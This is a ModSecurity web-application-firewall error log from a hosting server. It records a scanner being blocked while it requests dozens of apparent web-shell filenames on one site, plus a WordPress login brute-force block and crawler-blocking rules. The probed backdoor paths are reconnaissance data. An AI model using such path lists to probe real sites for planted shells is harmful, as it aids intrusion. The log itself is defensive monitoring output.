[Tue May 26 15:35:41.232805 2026] [security2:error] [pid 724639:tid 724875] [client 74.249.173.207:37532] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/xs.php"] [unique_id "ahVwdRKJRbiNp3eWdT2DfQAAAO8"]
[Tue May 26 15:35:41.504479 2026] [security2:error] [pid 724639:tid 724838] [client 74.249.173.207:38149] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/xxa.php"] [unique_id "ahVwdRKJRbiNp3eWdT2DhwAAAMo"]
[Tue May 26 15:35:41.504585 2026] [security2:error] [pid 724639:tid 724838] [client 74.249.173.207:38149] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/xxa.php"] [unique_id "ahVwdRKJRbiNp3eWdT2DhwAAAMo"]
[Tue May 26 15:35:41.734380 2026] [security2:error] [pid 724639:tid 724859] [client 74.249.173.207:44239] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/index0.php"] [unique_id "ahVwdRKJRbiNp3eWdT2DjQAAAN8"]
[Tue May 26 15:35:41.734479 2026] [security2:error] [pid 724639:tid 724859] [client 74.249.173.207:44239] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/index0.php"] [unique_id "ahVwdRKJRbiNp3eWdT2DjQAAAN8"]
[Tue May 26 15:35:41.905234 2026] [security2:error] [pid 724639:tid 724799] [client 74.249.173.207:1799] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/wp-kz.php"] [unique_id "ahVwdRKJRbiNp3eWdT2DjgAAAKM"]
[Tue May 26 15:35:41.905382 2026] [security2:error] [pid 724639:tid 724799] [client 74.249.173.207:1799] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/wp-kz.php"] [unique_id "ahVwdRKJRbiNp3eWdT2DjgAAAKM"]
[Tue May 26 15:35:42.172148 2026] [security2:error] [pid 724639:tid 724853] [client 74.249.173.207:41870] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/19.php"] [unique_id "ahVwdhKJRbiNp3eWdT2DngAAANk"]
[Tue May 26 15:35:42.172308 2026] [security2:error] [pid 724639:tid 724853] [client 74.249.173.207:41870] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/19.php"] [unique_id "ahVwdhKJRbiNp3eWdT2DngAAANk"]
[Tue May 26 15:35:42.332792 2026] [security2:error] [pid 724639:tid 724824] [client 74.249.173.207:42451] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/11.php"] [unique_id "ahVwdhKJRbiNp3eWdT2DogAAALw"]
[Tue May 26 15:35:42.332883 2026] [security2:error] [pid 724639:tid 724824] [client 74.249.173.207:42451] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/11.php"] [unique_id "ahVwdhKJRbiNp3eWdT2DogAAALw"]
[Tue May 26 15:35:43.236015 2026] [security2:error] [pid 724639:tid 724793] [client 74.249.173.207:41904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/w.php"] [unique_id "ahVwdxKJRbiNp3eWdT2DuAAAAJ0"]
[Tue May 26 15:35:43.236088 2026] [security2:error] [pid 724639:tid 724793] [client 74.249.173.207:41904] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/w.php"] [unique_id "ahVwdxKJRbiNp3eWdT2DuAAAAJ0"]
[Tue May 26 15:35:43.703585 2026] [security2:error] [pid 724639:tid 724788] [client 74.249.173.207:41868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/ws78.php"] [unique_id "ahVwdxKJRbiNp3eWdT2DwgAAAJg"]
[Tue May 26 15:35:43.703733 2026] [security2:error] [pid 724639:tid 724788] [client 74.249.173.207:41868] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/ws78.php"] [unique_id "ahVwdxKJRbiNp3eWdT2DwgAAAJg"]
[Tue May 26 15:35:43.975702 2026] [security2:error] [pid 724639:tid 724789] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwdxKJRbiNp3eWdT2DvwAAAJk"]
[Tue May 26 15:35:44.811674 2026] [security2:error] [pid 724639:tid 724856] [client 114.119.153.138:57975] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "preetishah.com"] [uri "/tdb_templates/100-stories-post-template-5/"] [unique_id "ahVweBKJRbiNp3eWdT2D2wAAANw"], referer: https://preetishah.com/tdb_templates/100-stories-post-template-5/
[Tue May 26 15:35:44.860880 2026] [security2:error] [pid 724639:tid 724878] [client 74.249.173.207:1902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/xxx.php"] [unique_id "ahVweBKJRbiNp3eWdT2D3AAAAPI"]
[Tue May 26 15:35:44.860980 2026] [security2:error] [pid 724639:tid 724878] [client 74.249.173.207:1902] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/xxx.php"] [unique_id "ahVweBKJRbiNp3eWdT2D3AAAAPI"]
[Tue May 26 15:35:45.125635 2026] [security2:error] [pid 724639:tid 724727] [remote 31.24.44.107:51908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVweBKJRbiNp3eWdT2D4AAAhlc"]
[Tue May 26 15:35:45.409947 2026] [security2:error] [pid 724639:tid 724786] [client 74.249.173.207:43444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/a7.php"] [unique_id "ahVweRKJRbiNp3eWdT2D6QAAAJY"]
[Tue May 26 15:35:45.410076 2026] [security2:error] [pid 724639:tid 724786] [client 74.249.173.207:43444] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/a7.php"] [unique_id "ahVweRKJRbiNp3eWdT2D6QAAAJY"]
[Tue May 26 15:35:45.774906 2026] [security2:error] [pid 724639:tid 724818] [client 74.249.173.207:41878] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/BDKR28WP.php"] [unique_id "ahVweRKJRbiNp3eWdT2D-wAAALY"]
[Tue May 26 15:35:45.775018 2026] [security2:error] [pid 724639:tid 724818] [client 74.249.173.207:41878] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/BDKR28WP.php"] [unique_id "ahVweRKJRbiNp3eWdT2D-wAAALY"]
[Tue May 26 15:35:46.177796 2026] [security2:error] [pid 724639:tid 724819] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVweRKJRbiNp3eWdT2D-gAAALc"]
[Tue May 26 15:35:46.473255 2026] [security2:error] [pid 724639:tid 724822] [client 74.249.173.207:36997] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/a1.php"] [unique_id "ahVwehKJRbiNp3eWdT2EAgAAALo"]
[Tue May 26 15:35:46.473412 2026] [security2:error] [pid 724639:tid 724822] [client 74.249.173.207:36997] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/a1.php"] [unique_id "ahVwehKJRbiNp3eWdT2EAgAAALo"]
[Tue May 26 15:35:47.441561 2026] [security2:error] [pid 724639:tid 724834] [client 74.249.173.207:28912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/d.php"] [unique_id "ahVwexKJRbiNp3eWdT2EGQAAAMY"]
[Tue May 26 15:35:47.441677 2026] [security2:error] [pid 724639:tid 724834] [client 74.249.173.207:28912] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/d.php"] [unique_id "ahVwexKJRbiNp3eWdT2EGQAAAMY"]
[Tue May 26 15:35:47.734778 2026] [security2:error] [pid 724639:tid 724845] [client 74.249.173.207:41911] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/xff.php"] [unique_id "ahVwexKJRbiNp3eWdT2EIgAAANE"]
[Tue May 26 15:35:47.734901 2026] [security2:error] [pid 724639:tid 724845] [client 74.249.173.207:41911] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/xff.php"] [unique_id "ahVwexKJRbiNp3eWdT2EIgAAANE"]
[Tue May 26 15:35:48.010676 2026] [security2:error] [pid 724639:tid 724842] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwexKJRbiNp3eWdT2EIQAAAM4"]
[Tue May 26 15:35:48.918237 2026] [security2:error] [pid 724639:tid 724885] [client 74.249.173.207:1230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/xltt.php"] [unique_id "ahVwfBKJRbiNp3eWdT2ETgAAAPk"]
[Tue May 26 15:35:48.918367 2026] [security2:error] [pid 724639:tid 724885] [client 74.249.173.207:1230] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/xltt.php"] [unique_id "ahVwfBKJRbiNp3eWdT2ETgAAAPk"]
[Tue May 26 15:35:49.158932 2026] [security2:error] [pid 724639:tid 724854] [client 74.249.173.207:28885] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/son.php"] [unique_id "ahVwfRKJRbiNp3eWdT2EUwAAANo"]
[Tue May 26 15:35:49.159078 2026] [security2:error] [pid 724639:tid 724854] [client 74.249.173.207:28885] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/son.php"] [unique_id "ahVwfRKJRbiNp3eWdT2EUwAAANo"]
[Tue May 26 15:35:49.407685 2026] [security2:error] [pid 724639:tid 724806] [client 74.249.173.207:30932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/doc.php"] [unique_id "ahVwfRKJRbiNp3eWdT2EXwAAAKo"]
[Tue May 26 15:35:49.407821 2026] [security2:error] [pid 724639:tid 724806] [client 74.249.173.207:30932] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/doc.php"] [unique_id "ahVwfRKJRbiNp3eWdT2EXwAAAKo"]
[Tue May 26 15:35:49.700878 2026] [security2:error] [pid 724639:tid 724890] [client 123.27.177.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwfRKJRbiNp3eWdT2EVwAAAP4"]
[Tue May 26 15:35:49.775845 2026] [security2:error] [pid 724639:tid 724894] [client 74.249.173.207:28889] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/zo.php"] [unique_id "ahVwfRKJRbiNp3eWdT2EbwAAAQI"]
[Tue May 26 15:35:49.775932 2026] [security2:error] [pid 724639:tid 724894] [client 74.249.173.207:28889] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/zo.php"] [unique_id "ahVwfRKJRbiNp3eWdT2EbwAAAQI"]
[Tue May 26 15:35:50.137946 2026] [security2:error] [pid 724639:tid 724879] [client 74.249.173.207:38202] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/xper1.php"] [unique_id "ahVwfhKJRbiNp3eWdT2EgAAAAPM"]
[Tue May 26 15:35:50.138050 2026] [security2:error] [pid 724639:tid 724879] [client 74.249.173.207:38202] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/xper1.php"] [unique_id "ahVwfhKJRbiNp3eWdT2EgAAAAPM"]
[Tue May 26 15:35:50.748052 2026] [security2:error] [pid 724639:tid 724841] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwfhKJRbiNp3eWdT2EgwAAAM0"]
[Tue May 26 15:35:50.778071 2026] [security2:error] [pid 724639:tid 724798] [client 74.249.173.207:30923] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/tiny.php"] [unique_id "ahVwfhKJRbiNp3eWdT2EjAAAAKI"]
[Tue May 26 15:35:50.778186 2026] [security2:error] [pid 724639:tid 724798] [client 74.249.173.207:30923] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/tiny.php"] [unique_id "ahVwfhKJRbiNp3eWdT2EjAAAAKI"]
[Tue May 26 15:35:51.842713 2026] [security2:error] [pid 724639:tid 724823] [client 74.249.173.207:1277] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/s1.php"] [unique_id "ahVwfxKJRbiNp3eWdT2EpgAAALs"]
[Tue May 26 15:35:51.842880 2026] [security2:error] [pid 724639:tid 724823] [client 74.249.173.207:1277] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/s1.php"] [unique_id "ahVwfxKJRbiNp3eWdT2EpgAAALs"]
[Tue May 26 15:35:52.166681 2026] [security2:error] [pid 724639:tid 724778] [client 74.249.173.207:1217] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/de.php"] [unique_id "ahVwgBKJRbiNp3eWdT2ErQAAAI4"]
[Tue May 26 15:35:52.166824 2026] [security2:error] [pid 724639:tid 724778] [client 74.249.173.207:1217] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/de.php"] [unique_id "ahVwgBKJRbiNp3eWdT2ErQAAAI4"]
[Tue May 26 15:35:52.754778 2026] [security2:error] [pid 724639:tid 724811] [client 74.249.173.207:30929] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/1a.php"] [unique_id "ahVwgBKJRbiNp3eWdT2EvQAAAK8"]
[Tue May 26 15:35:52.754955 2026] [security2:error] [pid 724639:tid 724811] [client 74.249.173.207:30929] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/1a.php"] [unique_id "ahVwgBKJRbiNp3eWdT2EvQAAAK8"]
[Tue May 26 15:35:52.967085 2026] [security2:error] [pid 724639:tid 724896] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwgBKJRbiNp3eWdT2EtgAAAQQ"]
[Tue May 26 15:35:53.248551 2026] [security2:error] [pid 724639:tid 724828] [client 74.249.173.207:38157] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/2.php"] [unique_id "ahVwgRKJRbiNp3eWdT2E1AAAAMA"]
[Tue May 26 15:35:53.248663 2026] [security2:error] [pid 724639:tid 724828] [client 74.249.173.207:38157] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/2.php"] [unique_id "ahVwgRKJRbiNp3eWdT2E1AAAAMA"]
[Tue May 26 15:35:53.737994 2026] [security2:error] [pid 724639:tid 724894] [client 74.249.173.207:41877] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/sky.php"] [unique_id "ahVwgRKJRbiNp3eWdT2E3QAAAQI"]
[Tue May 26 15:35:53.738107 2026] [security2:error] [pid 724639:tid 724894] [client 74.249.173.207:41877] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/sky.php"] [unique_id "ahVwgRKJRbiNp3eWdT2E3QAAAQI"]
[Tue May 26 15:35:54.530092 2026] [security2:error] [pid 724639:tid 724893] [client 74.249.173.207:28890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/man.php"] [unique_id "ahVwghKJRbiNp3eWdT2E9QAAAQE"]
[Tue May 26 15:35:54.530226 2026] [security2:error] [pid 724639:tid 724893] [client 74.249.173.207:28890] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/man.php"] [unique_id "ahVwghKJRbiNp3eWdT2E9QAAAQE"]
[Tue May 26 15:35:55.230011 2026] [security2:error] [pid 724639:tid 724802] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwghKJRbiNp3eWdT2E_QAAAKY"]
[Tue May 26 15:35:55.818008 2026] [security2:error] [pid 724639:tid 724833] [client 74.249.173.207:37053] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/ms-edit.php"] [unique_id "ahVwgxKJRbiNp3eWdT2FHAAAAMU"]
[Tue May 26 15:35:55.818167 2026] [security2:error] [pid 724639:tid 724833] [client 74.249.173.207:37053] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/ms-edit.php"] [unique_id "ahVwgxKJRbiNp3eWdT2FHAAAAMU"]
[Tue May 26 15:35:56.073732 2026] [security2:error] [pid 724639:tid 724856] [client 185.191.171.11:27706] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-21-25/list/"] [unique_id "ahVwhBKJRbiNp3eWdT2FIwAAANw"]
